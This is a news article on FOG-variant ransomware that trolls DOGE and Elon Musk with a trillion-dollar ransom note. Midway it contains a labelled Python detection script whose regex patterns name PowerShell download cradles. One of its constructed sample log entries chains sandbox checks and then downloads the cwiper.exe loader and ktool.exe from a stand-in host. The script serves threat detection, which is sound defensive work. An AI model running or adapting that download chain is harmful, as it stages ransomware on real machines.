DOGE-Trolling Ransomware Hackers Demand $1 Trillion In Bizarre Attack


Update, April 25, 2025: This story, originally published April 23, has been updated with further details regarding the DOGE ransomware attack and information from a new FBI report about the FOG malware threat used following the latest trillion-dollar ransom note demand.

The same criminal group behind the DOGE Big Balls ransomware attack has just upped the ante. A newly updated ransom note sent to victims is now trolling Elon Musk and DOGE by demanding a ridiculous extortion fee of, and I trust you are sitting down, one trillion dollars from victims. This one has Dr Evil written all over it. Here’s everything you need to know about the DOGE ransomware attackers, the FOG malware they have adapted, and the nature of that outrageous ransom note demand.


DOGE Ransomware Attackers Troll Elon Musk

Although there is no doubt that ransomware threats should be taken very seriously, what with a massive surge in ransomware attacks this year, new password-cracking tools being employed to gain initial access, and some very concerning political moves by big names in the extortion-racket industry, not all the players take themselves as seriously, it would seem. I certainly hope that’s the case as far as the DOGE ransomware attackers and the newly updated ransom note left for victims are concerned.

The ransomware group behind the recent DOGE Big Balls threat, using a variant of existing malware known as FOG, and trying to pin responsibility for the attacks on a well-known member of the Department of Government Efficiency team, has just updated its ransom note. The original threat was already bad enough, using a ZIP file with a deceptive shortcut to execute a multi-stage PowerShell infection chain exploiting a known Windows vulnerability, CVE-2015-2291, to gain kernel-level access and privilege escalation. The attack also, it has to be said, embedded political commentary and conspiracy theories within the ransomware scripts and code. These included such things as “The CIA didn’t kill Kennedy you idiot. Oswald is a very deranged person that felt ostracized by his own country.”

Now, as detailed in an April 21 security report by researchers Nathaniel Morales and Sarah Pearl Camiling at Trend Micro, the ransomware appears to have started trolling DOGE and Elon Musk mercilessly. In reference to the now-infamous Musk demand for federal workers to email DOGE what they had achieved, leaving them fearing for their jobs if they did not comply, the ransom note has been altered to read:

“Give me five bullet points on what you accomplished for work last week or you owe me a TRILLION dollars.”


DOGE Ransomware Reflects ‘Most Pervasive Threat’ FBI Warning

In an April 23 FBI internet crime report, B. Chad Yarbrough, the FBI operations director for criminal and cyber, confirmed that ransomware is “the most pervasive threat to critical infrastructure” and played an increasingly important role in the $16.6 billion cost of cybercrime to individuals and organizations in the U.S. across 2024. Interestingly, the FBI report said that the FOG ransomware threat, a variant of which has been used in the DOGE Big Balls attacks, was the most reported of new ransomware attacks during 2024. The bureau’s Internet Crime Complaint Center provides this information to field offices to help the FBI “identify new ransomware variants, discover the enterprises the threat actors are targeting, and determine whether critical infrastructure is being targeted,” the FBI said.

“The most alarming thing about the FBI’s IC3 report is that its numbers are just the tip of the formidable iceberg of organized cybercrime,” Dr Ilia Kolochenko, CEO at ImmuniWeb, said. Warning that a “growing number” of U.S. organizations prefer to silently settle with ransomware groups that carry a strong reputation for keeping attacks and data confidential following payment, Kolochenko said that it’s likely we will see this option continue to be taken. “In all cases,” Kolochenko advised, “the final decision to pay or not to pay should be brainstormed with cybercrime experts and lawyers having experience in such matters. Otherwise, you are running a sprint on thin ice.” In the case of the DOGE attacks, maybe less consideration is required when the demand is for a trillion dollars.


The FOG Malware Behind The DOGE Ransomware Threat

“The ransomware payload embedded in the samples has been verified as FOG ransomware,” the Trend Micro report warned, “an active ransomware family targeting both individuals and organizations.”

“FOG ransomware is a relatively new ransomware family that enterprises must add to their watchlist,” Trend Micro said, adding that “the impact of a successful ransomware attack could still potentially cost enterprises financial loss and operational disruption,” regardless of the DOGE references and the trolling nature of the ransom note itself.

The security researchers noted that the FOG ransomware itself has compromised some 100 victims in the first three months of the year, before the DOGE-trolling started, it would seem. In January, there were 18 victims, 53 in February and 29 in March.

Trend Micro said that the de-obfuscated script in the ransom note executed a PowerShell command that performs a multi-stage operation: retrieving a ransomware loader (cwiper.exe), ktool.exe and other PowerShell scripts. “It also opens politically themed YouTube videos and includes written political commentary directly in the script,” the report stated, which adds to the trolling element of the attack.

FOG also takes your security very seriously, at least as far as stopping defenders from analyzing the malware is concerned. “We have observed that prior to dropping its payload,” the security researchers confirmed, “the malware investigated checks various indicators, such as processor count, RAM, MAC address, registry, and tick count, to detect a sandbox.” If any of these security checks should fail, then FOG will exit the entire process.
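As an added illustration, not code from the article or from Trend Micro, here is a small Python triage routine that scores PowerShell script-block text (for example, collected from script-block logging) against the indicator families the article names: loader retrieval (cwiper.exe, ktool.exe), the sandbox checks (processor count, RAM, MAC address, tick count), and the ransom-note and political strings. The PowerShell/WMI spellings of the sandbox checks and the sample events are my own assumptions and constructions, not details taken from the report.

```python
import re

# Indicator families named in the Trend Micro and FBI reporting quoted in the article. Artifact names
# (cwiper.exe, ktool.exe) and ransom-note phrases come from the article; the PowerShell/WMI spellings
# of the sandbox checks are assumptions, not taken from the report.
INDICATORS = {
    "loader_retrieval": [r"\bcwiper\.exe\b", r"\bktool\.exe\b"],
    "download_cradle": [r"Invoke-WebRequest|DownloadFile|DownloadString|\biwr\b|\bcurl\b"],
    "sandbox_checks": [
        r"NUMBER_OF_PROCESSORS|NumberOfLogicalProcessors|Win32_Processor\b",
        r"TotalPhysicalMemory|Win32_ComputerSystem",
        r"MACAddress|Win32_NetworkAdapterConfiguration",
        r"TickCount",
    ],
    "ransom_note": [r"five bullet points", r"TRILLION dollars", r"Don'?t snitch", r"trilatitude"],
    "political_commentary": [r"youtube\.com", r"\bKennedy\b", r"\bOswald\b"],
}
# One family alone is weak evidence (admin scripts query WMI too); overlap across families matters.
WEIGHTS = {"loader_retrieval": 40, "download_cradle": 10, "sandbox_checks": 5,
           "ransom_note": 30, "political_commentary": 15}

def score_script_block(script):
    """Return (score, {family: [matched patterns]}) for one PowerShell script-block text."""
    hits = {}
    for family, patterns in INDICATORS.items():
        matched = [p for p in patterns if re.search(p, script, re.IGNORECASE)]
        if matched:
            hits[family] = matched
    score = sum(WEIGHTS[f] * len(m) for f, m in hits.items())
    if "sandbox_checks" in hits and len(hits) > 1:
        score += 20  # anti-analysis checks next to any other family: escalate
    return score, hits

def triage(events, threshold=50):
    """events: dicts with 'id' and 'script' (e.g. collected from PowerShell event ID 4104)."""
    flagged = []
    for ev in events:
        score, hits = score_script_block(ev["script"])
        if score >= threshold:
            flagged.append({"id": ev["id"], "score": score, "families": sorted(hits)})
    return flagged

# Constructed sample script blocks, not real logs: a routine admin task, an inventory query, and a
# chain of the shape the article describes (sandbox checks, then retrieval of the loader and ktool).
SAMPLE_EVENTS = [
    {"id": 1, "script": "Get-Service | Where-Object Status -eq 'Running' | Export-Csv svc.csv"},
    {"id": 2, "script": "Get-CimInstance Win32_NetworkAdapterConfiguration | Select MACAddress"},
    {"id": 3, "script": "if ((Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory -lt 4GB) { exit }; "
                        "if ([Environment]::TickCount -lt 600000) { exit }; "
                        "Invoke-WebRequest http://example.invalid/cwiper.exe -OutFile $env:TEMP\\cwiper.exe; "
                        "Invoke-WebRequest http://example.invalid/ktool.exe -OutFile $env:TEMP\\ktool.exe"},
]
```

Running `triage(SAMPLE_EVENTS)` flags only event 3; the lone MAC-address query in event 2 scores too low on its own, which is the point of weighting overlap rather than single matches.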


Should You Take The DOGE Ransom Note Seriously?

It’s imperative, then, that you do not assume that just because the attackers might act like clowns, the threat itself isn’t serious.

Indeed, the ransomware demand itself is all business. “We are the ones who encrypted your data and also copied some of it to our internal resource,” the attackers state. They then advise the victim that the sooner they are contacted, the sooner they can get everything resolved, offering instructions on using a Tor browser to get the next steps.

The DOGE references are not the only trolling in the updated ransom note; there’s also a “Don’t snitch now” warning. This could be in response to the ransomware informer platform that I have previously reported on. The humor — I guess that’s what it is an attempt at — continues with a warning from the attackers that they have “grabbed your trilatitude and trilongitude (the most accurate) coordinates of where you live,” in order to prove that they are lying. Not lying and not funny, but not to be ignored either.
